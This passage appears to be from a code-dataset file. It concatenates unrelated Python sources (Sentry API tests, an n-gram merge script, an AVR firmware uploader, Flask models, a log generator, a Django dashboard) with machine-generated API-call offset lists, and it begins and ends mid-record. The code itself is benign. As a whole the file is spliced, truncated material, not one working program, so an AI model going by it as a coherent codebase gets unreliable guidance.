2360), False, 'from textacy import cache\n'), ((2691, 2712), 'textacy.Corpus.load', 'Corpus.load', (['filepath'], {}), '(filepath)\n', (2702, 2712), False, 'from textacy import Corpus\n'), ((728, 740), 'textacy.Corpus', 'Corpus', (['"""en"""'], {}), "('en')\n", (734, 740), False, 'from textacy import Corpus\n'), ((1765, 1804), 'textacy.Doc', 'Doc', (['text'], {'lang': '"""en"""', 'metadata': 'metadata'}), "(text, lang='en', metadata=metadata)\n", (1768, 1804), False, 'from textacy import Doc\n'), ((779, 801), 'textacy.cache.load_spacy', 'cache.load_spacy', (['"""en"""'], {}), "('en')\n", (795, 801), False, 'from textacy import cache\n'), ((860, 884), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (873, 884), False, 'import pytest\n'), ((898, 914), 'textacy.Corpus', 'Corpus', (['bad_lang'], {}), '(bad_lang)\n', (904, 914), False, 'from textacy import Corpus\n')] |
from django.core.urlresolvers import reverse
from mock import patch
from sentry.constants import MEMBER_ADMIN
from sentry.models import Team, TeamStatus
from sentry.testutils import APITestCase
class TeamDetailsTest(APITestCase):
def test_simple(self):
team = self.team # force creation
self.login_as(user=self.user)
url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
response = self.client.get(url)
assert response.status_code == 200
assert response.data['id'] == str(team.id)
class TeamUpdateTest(APITestCase):
def test_simple(self):
team = self.team # force creation
self.login_as(user=self.user)
url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
resp = self.client.put(url, data={
'name': '<NAME>',
'slug': 'foobar',
})
assert resp.status_code == 200, resp.content
team = Team.objects.get(id=team.id)
assert team.name == '<NAME>'
assert team.slug == 'foobar'
def test_invalid_slug(self):
team = self.team # force creation
self.login_as(user=self.user)
url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
resp = self.client.put(url, data={
'name': '<NAME>',
'slug': 'admin',
})
assert resp.status_code == 400, resp.content
def test_owner_can_change_owner(self):
user = self.create_user('<EMAIL>', is_superuser=False)
new_user = self.create_user('<EMAIL>')
team = self.create_team(owner=user)
url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
self.login_as(user=user)
resp = self.client.put(url, {
'name': 'Test Team',
'slug': 'test',
'owner': new_user.username,
})
assert resp.status_code == 200, resp.content
team = Team.objects.get(name='Test Team')
assert team.owner == new_user
member_set = list(team.member_set.all())
self.assertEquals(len(member_set), 2)
member_set.sort(key=lambda x: x.user_id)
member = member_set[0]
self.assertEquals(member.user, user)
self.assertEquals(member.type, MEMBER_ADMIN)
member = member_set[1]
self.assertEquals(member.user, new_user)
self.assertEquals(member.type, MEMBER_ADMIN)
class TeamDeleteTest(APITestCase):
@patch('sentry.api.endpoints.team_details.delete_team')
def test_simple(self, delete_team):
team = self.create_team()
project = self.create_project(team=team) # NOQA
self.login_as(user=self.user)
url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
with self.settings(SENTRY_PROJECT=0):
response = self.client.delete(url)
team = Team.objects.get(id=team.id)
assert team.status == TeamStatus.PENDING_DELETION
assert response.status_code == 204
delete_team.delay.assert_called_once_with(
object_id=team.id,
countdown=60 * 5,
)
def test_internal_project(self):
team = self.create_team()
project = self.create_project(team=team)
self.login_as(user=self.user)
url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
with self.settings(SENTRY_PROJECT=project.id):
response = self.client.delete(url)
assert response.status_code == 403
def test_as_non_owner(self):
team = self.create_team(owner=self.user)
project = self.create_project(team=team) # NOQA
user = self.create_user(email='<EMAIL>', is_superuser=False)
team.member_set.create(user=user, type=MEMBER_ADMIN)
self.login_as(user=user)
url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
response = self.client.delete(url)
assert response.status_code == 403
| [
"sentry.models.Team.objects.get",
"mock.patch",
"django.core.urlresolvers.reverse"
] | [((2482, 2536), 'mock.patch', 'patch', (['"""sentry.api.endpoints.team_details.delete_team"""'], {}), "('sentry.api.endpoints.team_details.delete_team')\n", (2487, 2536), False, 'from mock import patch\n'), ((355, 420), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (362, 420), False, 'from django.core.urlresolvers import reverse\n'), ((714, 779), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (721, 779), False, 'from django.core.urlresolvers import reverse\n'), ((962, 990), 'sentry.models.Team.objects.get', 'Team.objects.get', ([], {'id': 'team.id'}), '(id=team.id)\n', (978, 990), False, 'from sentry.models import Team, TeamStatus\n'), ((1194, 1259), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (1201, 1259), False, 'from django.core.urlresolvers import reverse\n'), ((1639, 1704), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (1646, 1704), False, 'from django.core.urlresolvers import reverse\n'), ((1959, 1993), 'sentry.models.Team.objects.get', 'Team.objects.get', ([], {'name': '"""Test Team"""'}), "(name='Test Team')\n", (1975, 1993), False, 'from sentry.models import Team, TeamStatus\n'), ((2722, 2787), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (2729, 2787), False, 'from django.core.urlresolvers import reverse\n'), ((2898, 2926), 'sentry.models.Team.objects.get', 'Team.objects.get', ([], {'id': 'team.id'}), '(id=team.id)\n', (2914, 2926), False, 'from sentry.models import Team, TeamStatus\n'), ((3327, 3392), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (3334, 3392), False, 'from django.core.urlresolvers import reverse\n'), ((3861, 3926), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (3868, 3926), False, 'from django.core.urlresolvers import reverse\n')] |
import gzip
import glob
import argparse
import sys
def merge():
with gzip.open("ngram.merged.txt.gz", 'w') as file_write_handler:
files = glob.glob("pubmed*.txt.gz")
for current_file in files:
print("processing: {}".format(current_file))
with gzip.open(current_file, 'rb') as file_open_handler:
for line in file_open_handler:
file_write_handler.write(line)
def sort_merged_file():
pass
if __name__ == '__main__':
print('Number of arguments:', len(sys.argv), 'arguments.')
print('Argument List:', str(sys.argv))
lista = []
with gzip.open("ngram.merged_sorted.gz", 'rb') as file_open_handler:
for line in file_open_handler:
line_split = line.decode("utf-8").strip().split("\t")
lista.append([line_split[0], int(line_split[1])])
lista = sorted(lista, key=lambda line_split: line_split[1], reverse=True)
with gzip.open("ngram.merged_sorted1.txt.gz", 'w') as file_write_handler:
with gzip.open("ngram.merged_sorted2.txt.gz", 'w') as file_write2_handler:
for line_split in lista:
temp_str = "\t".join(str(x) for x in line_split)
if len(line_split[0].split(" ")) == 1:
file_write_handler.write("{}\n".format(temp_str).encode("utf-8"))
else:
file_write2_handler.write("{}\n".format(temp_str).encode("utf-8"))
print("*-*-*")
# parser = argparse.ArgumentParser(description='utils')
# parser.add_argument('integers', metavar='N', type=int, nargs='+',
# help='an integer for the accumulator')
# parser.add_argument('--sum', dest='accumulate', action='store_const',
# const=sum, default=max,
# help='sum the integers (default: find the max)')
#
# args = parser.parse_args()
# # print(args.accumulate(args.integers))
| [
"glob.glob",
"gzip.open"
] | [((75, 112), 'gzip.open', 'gzip.open', (['"""ngram.merged.txt.gz"""', '"""w"""'], {}), "('ngram.merged.txt.gz', 'w')\n", (84, 112), False, 'import gzip\n'), ((153, 180), 'glob.glob', 'glob.glob', (['"""pubmed*.txt.gz"""'], {}), "('pubmed*.txt.gz')\n", (162, 180), False, 'import glob\n'), ((636, 677), 'gzip.open', 'gzip.open', (['"""ngram.merged_sorted.gz"""', '"""rb"""'], {}), "('ngram.merged_sorted.gz', 'rb')\n", (645, 677), False, 'import gzip\n'), ((959, 1004), 'gzip.open', 'gzip.open', (['"""ngram.merged_sorted1.txt.gz"""', '"""w"""'], {}), "('ngram.merged_sorted1.txt.gz', 'w')\n", (968, 1004), False, 'import gzip\n'), ((1041, 1086), 'gzip.open', 'gzip.open', (['"""ngram.merged_sorted2.txt.gz"""', '"""w"""'], {}), "('ngram.merged_sorted2.txt.gz', 'w')\n", (1050, 1086), False, 'import gzip\n'), ((290, 319), 'gzip.open', 'gzip.open', (['current_file', '"""rb"""'], {}), "(current_file, 'rb')\n", (299, 319), False, 'import gzip\n')] |
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# <NAME> wrote this file. As long as you retain
# this notice you can do whatever you want with this stuff. If we meet some day,
# and you think this stuff is worth it, you can buy me a beer in return.
# ----------------------------------------------------------------------------
import sys
import re
import requests
import platform # For getting the operating system name
import subprocess # For executing a shell command
import os
import time
ip_regex = "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"
def main(argv):
print("--- flash2560 - Created by <NAME> ---")
hostname = "192.168.4.1"
input_file = "none"
# Handle the command line arguments
for index, arg in enumerate(argv):
if arg == "-h" or arg == "--help":
print_help()
sys.exit(0)
elif arg == "-H" or arg == "--hostname":
if index + 1 < len(argv) and re.search(ip_regex, argv[index + 1]):
hostname = argv[index + 1]
if not ping(hostname):
print("IP is not reachable:")
sys.exit(2)
else:
print("IP address is not right")
print_help()
sys.exit(1)
elif arg == "-f" or arg == "--file":
if index + 1 < len(argv) and os.path.isfile(argv[index + 1]):
input_file = argv[index + 1]
else:
print("Can't open file")
print_help()
sys.exit(3)
if input_file == "none":
print("No input file")
print_help()
sys.exit(4)
response = requests.post('http://' + hostname + '/pgmmega/sync')
# ------------ GET AVR in SYNC ----------------------------------------
if response.status_code != 204:
print("Failed to reset the AVR (HTML ERROR: " + response.status_code + ")")
sys.exit(5)
while True:
response = requests.get('http://' + hostname + '/pgmmega/sync')
if "SYNC" in response.content.decode('ASCII'):
print(response.content)
break
elif "NOT READY" not in response.content.decode('ASCII'):
print("Could not get in Sync with AVR")
sys.exit(7)
time.sleep(0.1)
# -------------- Upload HEX file -----------------------------------------
hex_file = open(input_file).read()
response = requests.post('http://' + hostname + '/pgmmega/upload', data=hex_file, timeout=20.0)
if "Success" in response.content.decode('ASCII'):
print("+++++ Success :) ++++++")
else:
print("Failed :(")
sys.exit(8)
# Reset the avr to solve a bug in the bootloader that the program dows not start immediately
time.sleep(0.1)
requests.post('http://' + hostname + '/console/reset')
sys.exit(0)
def print_help():
print('\n')
print("Usage: ")
print("flash2560.py -H <hostname> -f <hex_file>")
print("\nExample:")
print("flash2560.py -H 192.168.4.1 -f Sketch.hex")
def ping(host):
param = '-n' if platform.system().lower() == 'windows' else '-c'
command = ['ping', param, '1', host]
output = open(os.devnull, 'w')
return subprocess.call(command, stdout=output) == 0
if __name__ == "__main__":
main(sys.argv[1:])
| [
"requests.post",
"requests.get",
"time.sleep",
"os.path.isfile",
"platform.system",
"subprocess.call",
"sys.exit",
"re.search"
] | [((1824, 1877), 'requests.post', 'requests.post', (["('http://' + hostname + '/pgmmega/sync')"], {}), "('http://' + hostname + '/pgmmega/sync')\n", (1837, 1877), False, 'import requests\n'), ((2600, 2688), 'requests.post', 'requests.post', (["('http://' + hostname + '/pgmmega/upload')"], {'data': 'hex_file', 'timeout': '(20.0)'}), "('http://' + hostname + '/pgmmega/upload', data=hex_file,\n timeout=20.0)\n", (2613, 2688), False, 'import requests\n'), ((2940, 2955), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (2950, 2955), False, 'import time\n'), ((2960, 3014), 'requests.post', 'requests.post', (["('http://' + hostname + '/console/reset')"], {}), "('http://' + hostname + '/console/reset')\n", (2973, 3014), False, 'import requests\n'), ((3020, 3031), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3028, 3031), False, 'import sys\n'), ((1796, 1807), 'sys.exit', 'sys.exit', (['(4)'], {}), '(4)\n', (1804, 1807), False, 'import sys\n'), ((2086, 2097), 'sys.exit', 'sys.exit', (['(5)'], {}), '(5)\n', (2094, 2097), False, 'import sys\n'), ((2134, 2186), 'requests.get', 'requests.get', (["('http://' + hostname + '/pgmmega/sync')"], {}), "('http://' + hostname + '/pgmmega/sync')\n", (2146, 2186), False, 'import requests\n'), ((2448, 2463), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (2458, 2463), False, 'import time\n'), ((2826, 2837), 'sys.exit', 'sys.exit', (['(8)'], {}), '(8)\n', (2834, 2837), False, 'import sys\n'), ((3397, 3436), 'subprocess.call', 'subprocess.call', (['command'], {'stdout': 'output'}), '(command, stdout=output)\n', (3412, 3436), False, 'import subprocess\n'), ((998, 1009), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1006, 1009), False, 'import sys\n'), ((2427, 2438), 'sys.exit', 'sys.exit', (['(7)'], {}), '(7)\n', (2435, 2438), False, 'import sys\n'), ((1100, 1136), 're.search', 're.search', (['ip_regex', 'argv[index + 1]'], {}), '(ip_regex, argv[index + 1])\n', (1109, 1136), False, 'import re\n'), ((1414, 1425), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1422, 1425), False, 'import sys\n'), ((3260, 3277), 'platform.system', 'platform.system', ([], {}), '()\n', (3275, 3277), False, 'import platform\n'), ((1290, 1301), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (1298, 1301), False, 'import sys\n'), ((1512, 1543), 'os.path.isfile', 'os.path.isfile', (['argv[index + 1]'], {}), '(argv[index + 1])\n', (1526, 1543), False, 'import os\n'), ((1694, 1705), 'sys.exit', 'sys.exit', (['(3)'], {}), '(3)\n', (1702, 1705), False, 'import sys\n')] |
from datetime import datetime
from book_manage import db, login_manager
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
return Admin.query.get(int(user_id))
# This class to hold Admins who uploads books.
class Admin(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(100), nullable=False)
email = db.Column(db.String(100), nullable=False)
password = db.Column(db.String(100), nullable=False)
# create relationship with Uploaded Table.
posts = db.relationship('Uploaded', backref='auth', lazy=True)
def __repr__(self):
return f"Admin('{self.username}', '{self.email}')"
# This is a table where books gonna be saved.
class Uploaded(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100), nullable=False)
author = db.Column(db.String(10))
description = db.Column(db.Text)
# Here db.ForeignKey('user.id'), mean that he have a relationship to our user model.
user_id = db.Column(db.Integer, db.ForeignKey('admin.id'), nullable=False)
def __repr__(self):
return f"Uploaded('{self.title}', '{self.author}', '{self.description}')"
# This is a table where all the borrowed books info
# gonna be saved.
class Borrowed(db.Model):
id = db.Column(db.Integer, primary_key=True)
customer = db.Column(db.String(16), nullable=False)
title = db.Column(db.String(100), nullable=False)
author = db.Column(db.String(10))
borrow_date = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
return_date = db.Column(db.DateTime, nullable=False)
def __repr__(self):
return f"Borrowed('{self.customer}', '{self.title}', '{self.author}', '{self.borrow_date}', '{self.return_date}')"
# This is a table to save users who borrow the book.
# And information of that book.
class Returned(db.Model):
id = db.Column(db.Integer, primary_key=True)
customer_name = db.Column(db.String(16), nullable=False)
customer_id = db.Column(db.Integer, nullable=False)
book_title = db.Column(db.String(100), nullable=False)
book_author = db.Column(db.String(100), nullable=False)
borrowed_date = db.Column(db.DateTime, nullable=False)
returned_date = db.Column(db.DateTime, nullable=False)
def __repr__(self):
return f"Returned('{self.customer_name}', '{self.book_title}', '{self.borrowed_date}', '{self.returned_date}')"
| [
"book_manage.db.ForeignKey",
"book_manage.db.relationship",
"book_manage.db.String",
"book_manage.db.Column"
] | [((293, 332), 'book_manage.db.Column', 'db.Column', (['db.Integer'], {'primary_key': '(True)'}), '(db.Integer, primary_key=True)\n', (302, 332), False, 'from book_manage import db, login_manager\n'), ((565, 619), 'book_manage.db.relationship', 'db.relationship', (['"""Uploaded"""'], {'backref': '"""auth"""', 'lazy': '(True)'}), "('Uploaded', backref='auth', lazy=True)\n", (580, 619), False, 'from book_manage import db, login_manager\n'), ((794, 833), 'book_manage.db.Column', 'db.Column', (['db.Integer'], {'primary_key': '(True)'}), '(db.Integer, primary_key=True)\n', (803, 833), False, 'from book_manage import db, login_manager\n'), ((944, 962), 'book_manage.db.Column', 'db.Column', (['db.Text'], {}), '(db.Text)\n', (953, 962), False, 'from book_manage import db, login_manager\n'), ((1354, 1393), 'book_manage.db.Column', 'db.Column', (['db.Integer'], {'primary_key': '(True)'}), '(db.Integer, primary_key=True)\n', (1363, 1393), False, 'from book_manage import db, login_manager\n'), ((1560, 1623), 'book_manage.db.Column', 'db.Column', (['db.DateTime'], {'nullable': '(False)', 'default': 'datetime.utcnow'}), '(db.DateTime, nullable=False, default=datetime.utcnow)\n', (1569, 1623), False, 'from book_manage import db, login_manager\n'), ((1642, 1680), 'book_manage.db.Column', 'db.Column', (['db.DateTime'], {'nullable': '(False)'}), '(db.DateTime, nullable=False)\n', (1651, 1680), False, 'from book_manage import db, login_manager\n'), ((1951, 1990), 'book_manage.db.Column', 'db.Column', (['db.Integer'], {'primary_key': '(True)'}), '(db.Integer, primary_key=True)\n', (1960, 1990), False, 'from book_manage import db, login_manager\n'), ((2070, 2107), 'book_manage.db.Column', 'db.Column', (['db.Integer'], {'nullable': '(False)'}), '(db.Integer, nullable=False)\n', (2079, 2107), False, 'from book_manage import db, login_manager\n'), ((2247, 2285), 'book_manage.db.Column', 'db.Column', (['db.DateTime'], {'nullable': '(False)'}), '(db.DateTime, nullable=False)\n', (2256, 2285), False, 'from book_manage import db, login_manager\n'), ((2306, 2344), 'book_manage.db.Column', 'db.Column', (['db.DateTime'], {'nullable': '(False)'}), '(db.DateTime, nullable=False)\n', (2315, 2344), False, 'from book_manage import db, login_manager\n'), ((358, 372), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (367, 372), False, 'from book_manage import db, login_manager\n'), ((412, 426), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (421, 426), False, 'from book_manage import db, login_manager\n'), ((469, 483), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (478, 483), False, 'from book_manage import db, login_manager\n'), ((856, 870), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (865, 870), False, 'from book_manage import db, login_manager\n'), ((911, 924), 'book_manage.db.String', 'db.String', (['(10)'], {}), '(10)\n', (920, 924), False, 'from book_manage import db, login_manager\n'), ((1093, 1118), 'book_manage.db.ForeignKey', 'db.ForeignKey', (['"""admin.id"""'], {}), "('admin.id')\n", (1106, 1118), False, 'from book_manage import db, login_manager\n'), ((1419, 1432), 'book_manage.db.String', 'db.String', (['(16)'], {}), '(16)\n', (1428, 1432), False, 'from book_manage import db, login_manager\n'), ((1472, 1486), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (1481, 1486), False, 'from book_manage import db, login_manager\n'), ((1527, 1540), 'book_manage.db.String', 'db.String', (['(10)'], {}), '(10)\n', (1536, 1540), False, 'from book_manage import db, login_manager\n'), ((2021, 2034), 'book_manage.db.String', 'db.String', (['(16)'], {}), '(16)\n', (2030, 2034), False, 'from book_manage import db, login_manager\n'), ((2135, 2149), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (2144, 2149), False, 'from book_manage import db, login_manager\n'), ((2195, 2209), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (2204, 2209), False, 'from book_manage import db, login_manager\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2017-08-22 14:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cards', '0003_session_revision'),
]
operations = [
migrations.AlterField(
model_name='session',
name='date_created',
field=models.DateTimeField(auto_now_add=True, verbose_name='Date created'),
),
migrations.AlterField(
model_name='session',
name='date_modified',
field=models.DateTimeField(auto_now=True, verbose_name='Date modified'),
),
]
| [
"django.db.models.DateTimeField"
] | [((403, 471), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""Date created"""'}), "(auto_now_add=True, verbose_name='Date created')\n", (423, 471), False, 'from django.db import migrations, models\n'), ((601, 666), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)', 'verbose_name': '"""Date modified"""'}), "(auto_now=True, verbose_name='Date modified')\n", (621, 666), False, 'from django.db import migrations, models\n')] |
from typing import List
import os
"""
Event counter. Is counted up for each new event (row in CSV file) generated.
"""
event_count = 0
"""
Counting commands being issued. Used as second argument
to events (the 'nr'). First generated will be 0.
"""
command_counter: int = 0
"""
The file written to.
"""
file = None
def write(event: str):
"""
Writing a row in the CSV file corresponding to an event.
:param event: the event.
"""
global file
global event_count
event_count += 1
#print(event)
file.write(f'{event}\n')
def next_nr() -> str:
"""
Generates a new command number.
:return: the new command number.
"""
global command_counter
value = command_counter
command_counter += 1
return f'{value}'
def blast(commands: int):
"""
Issues 'commands' commands in parallel, dispatches them, succeeds them,
and closes them.
:param commands: the number of commands being issued in parallel.
"""
commands = [(cmd, next_nr()) for cmd in range(commands)]
for (c, n) in commands:
command(c, n)
for (c, n) in commands:
dispatch(c, n)
for (c, n) in commands:
succeed(c, n)
for (c, n) in commands:
close(c, n)
def log(commands: int, repeat: int):
"""
Generates a log consiting of 'repeat' sections, each section
consisting of 'commands' commands being issues, dispatched, succeeding,
and closing, all in parallel.
:param commands: the number of commands being issued in parallel.
:param repeat: the number of times the parallel command executions should be repeated.
"""
global command_counter
global event_count
global file
command_counter = 0
event_count = 0
file_name = f'log-{commands}-{repeat}.csv'
file = open(file_name, "w")
for x in range(repeat):
blast(commands)
file.close()
print()
print(f'{file_name}')
print(f'{event_count} events generated')
def command(cmd: str, nr: str, kind: str = "FSW"):
"""
Generates a command event.
:param cmd: the command.
:param nr: the command number.
:param kind: the command kind.
"""
write(f'command,{cmd},{nr},{kind}')
def dispatch(cmd: str, nr: str):
"""
Generates a dispatch event.
:param cmd: the command.
:param nr: the command number.
"""
write(f'dispatch,{cmd},{nr}')
def succeed(cmd: str, nr: str):
"""
Generates a succeed event.
:param cmd: the command.
:param nr: the command number.
"""
write(f'succeed,{cmd},{nr}')
def close(cmd: str, nr: str):
"""
Generates a close event.
:param cmd: the command.
:param nr: the command number.
"""
write(f'close,{cmd},{nr}')
def cancel(cmd: str, nr: str):
"""
Generates a cancel event.
:param cmd: the command.
:param nr: the command number.
"""
write(f'cancel,{cmd},{nr}')
def fail(cmd: str, nr: str):
"""
Generates a fail event.
:param cmd: the command.
:param nr: the command number.
"""
write(f'fail,{cmd},{nr}')
def copy_files():
dev = '/Users/khavelun/Desktop/development'
dir_logscope_cpp = f'{dev}/logscope/backend/test/suite8'
dir_logscope_py = f'{dev}/pycharmworkspace/logscope/examples/example3-sacsvt-2022'
dir_daut = f'{dev}/ideaworkspace/daut/src/test/scala/daut38_sacsvt_2022'
dirs = [dir_logscope_cpp, dir_logscope_py, dir_daut]
for d in dirs:
os.system(f'rm {d}/log*.csv')
os.system(f'cp log*.csv {d}')
if __name__ == '__main__':
os.system('rm log*.csv')
# traces of length 100,000 events
log(1, 12500)
log(50, 250)
# traces of length 200,000 events
log(1, 50000)
log(5, 10000)
log(10, 5000)
log(20, 2500)
# traces of length 500,000 events
log(1, 125000)
log(5, 25000)
# copy files to logscope-py, logscope-cpp, daut
copy_files()
| [
"os.system"
] | [((3565, 3589), 'os.system', 'os.system', (['"""rm log*.csv"""'], {}), "('rm log*.csv')\n", (3574, 3589), False, 'import os\n'), ((3464, 3493), 'os.system', 'os.system', (['f"""rm {d}/log*.csv"""'], {}), "(f'rm {d}/log*.csv')\n", (3473, 3493), False, 'import os\n'), ((3502, 3531), 'os.system', 'os.system', (['f"""cp log*.csv {d}"""'], {}), "(f'cp log*.csv {d}')\n", (3511, 3531), False, 'import os\n')] |
#!/usr/bin/python
# ex:set fileencoding=utf-8:
from __future__ import unicode_literals
from django.conf.urls import patterns
# from django.conf.urls import url
from django.contrib.admin.sites import AlreadyRegistered
from django.core.exceptions import ImproperlyConfigured
from django.utils import six
from django.utils.text import slugify
from collections import OrderedDict
from .category import Category
import re
import logging
logger = logging.getLogger(__name__)
class DashboardMetaclass(type):
def __new__(cls, name, bases, attrs):
super_new = super(DashboardMetaclass, cls).__new__
parents = [
b for b in bases if isinstance(b, DashboardMetaclass) and
not (b.__name__ == 'NewBase' and b.__mro__ == (b, object))
]
if not parents:
return super_new(cls, name, bases, attrs)
# Create the class.
new_cls = super_new(cls, name, bases, attrs)
# validation
if not getattr(new_cls, 'name', None):
raise ImproperlyConfigured('No name attribute defined in %s.' % new_cls)
if not getattr(new_cls, 'slug', None):
raise ImproperlyConfigured('No slug attribute defined in %s.' % new_cls)
if not re.match('^[\w-]+$', new_cls.slug):
raise ImproperlyConfigured('The slug attribute defined in %s contains invalid chars.' % new_cls)
# we add a key to add a unique identifier
# the key is equal to the slug (for now) but this
# gives us the opportunity to add i18n urls later
key = getattr(new_cls, 'key', new_cls.slug)
if re.match(key, r'^[\w-]%'):
new_cls.key = key
else:
new_cls.key = slugify(key)
return new_cls
class Dashboard(six.with_metaclass(DashboardMetaclass, object)):
def __init__(self, site):
self.data = OrderedDict()
self.site = site
self.modules = []
self.reports = []
def __bool__(self):
return bool(self.data)
def __nonzero__(self):
return self.__bool__()
def __len__(self):
return len(self.data)
def __eq__(self, other):
if isinstance(other, Dashboard):
return self.key == other.key
else:
return False
def __iter__(self):
return self.data.values().__iter__()
def __getitem__(self, key):
return self.data[key]
def __contains__(self, item):
if isinstance(item, Category):
key = item.key
else:
key = item
return key in self.data
def get_urls(self):
urlpatterns = patterns('')
# for category in self:
# for view in category:
# class ViewFactory(view, ModuleListView):
# pass
# ViewFactory._bmf_view_class = view
# ViewFactory._bmf_category = category
# ViewFactory._bmf_dashboard = self
# urlpatterns += patterns(
# '',
# url(
# r'^view/%s/%s/' % (category.slug, view.slug),
# ViewFactory.as_view(
# ),
# name='view_%s_%s' % (category.key, view.key),
# kwargs={
# 'category': category.key,
# 'view': view.key,
# },
# ),
# )
return urlpatterns
def add_report(self, report_class):
"""
Adds a report to the dashboard
"""
for report in self.reports:
if isinstance(report_class, report):
raise AlreadyRegistered('The report %s is already registered' % report_class.__name__)
report = report_class()
self.reports.append(report)
logger.debug('Registered Report "%s"', report.key)
return report
def get_module(self, model):
return self.site.modules[model]
def add_module(self, module):
"""
Adds a module to the dashboard
"""
if module.model in self.site.modules:
raise AlreadyRegistered('The module %s is already registered' % module.model.__name__)
self.site.modules[module.model] = module()
logger.debug('Registered Module "%s"', module.__name__)
return self.site.modules[module.model]
def add_category(self, category):
"""
Adds a category to the dashboard
"""
for cat in self.data.values():
if isinstance(cat, category):
return cat
cat = category()
self.data[cat.key] = cat
logger.debug('Registered Category "%s"', cat.__class__.__name__)
return cat
| [
"logging.getLogger",
"django.utils.text.slugify",
"collections.OrderedDict",
"django.utils.six.with_metaclass",
"re.match",
"django.contrib.admin.sites.AlreadyRegistered",
"django.conf.urls.patterns",
"django.core.exceptions.ImproperlyConfigured"
] | [((447, 474), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (464, 474), False, 'import logging\n'), ((1771, 1817), 'django.utils.six.with_metaclass', 'six.with_metaclass', (['DashboardMetaclass', 'object'], {}), '(DashboardMetaclass, object)\n', (1789, 1817), False, 'from django.utils import six\n'), ((1619, 1644), 're.match', 're.match', (['key', '"""^[\\\\w-]%"""'], {}), "(key, '^[\\\\w-]%')\n", (1627, 1644), False, 'import re\n'), ((1871, 1884), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1882, 1884), False, 'from collections import OrderedDict\n'), ((2632, 2644), 'django.conf.urls.patterns', 'patterns', (['""""""'], {}), "('')\n", (2640, 2644), False, 'from django.conf.urls import patterns\n'), ((1028, 1094), 'django.core.exceptions.ImproperlyConfigured', 'ImproperlyConfigured', (["('No name attribute defined in %s.' % new_cls)"], {}), "('No name attribute defined in %s.' % new_cls)\n", (1048, 1094), False, 'from django.core.exceptions import ImproperlyConfigured\n'), ((1161, 1227), 'django.core.exceptions.ImproperlyConfigured', 'ImproperlyConfigured', (["('No slug attribute defined in %s.' % new_cls)"], {}), "('No slug attribute defined in %s.' % new_cls)\n", (1181, 1227), False, 'from django.core.exceptions import ImproperlyConfigured\n'), ((1244, 1279), 're.match', 're.match', (['"""^[\\\\w-]+$"""', 'new_cls.slug'], {}), "('^[\\\\w-]+$', new_cls.slug)\n", (1252, 1279), False, 'import re\n'), ((1298, 1393), 'django.core.exceptions.ImproperlyConfigured', 'ImproperlyConfigured', (["('The slug attribute defined in %s contains invalid chars.' % new_cls)"], {}), "(\n 'The slug attribute defined in %s contains invalid chars.' % new_cls)\n", (1318, 1393), False, 'from django.core.exceptions import ImproperlyConfigured\n'), ((1716, 1728), 'django.utils.text.slugify', 'slugify', (['key'], {}), '(key)\n', (1723, 1728), False, 'from django.utils.text import slugify\n'), ((4197, 4282), 'django.contrib.admin.sites.AlreadyRegistered', 'AlreadyRegistered', 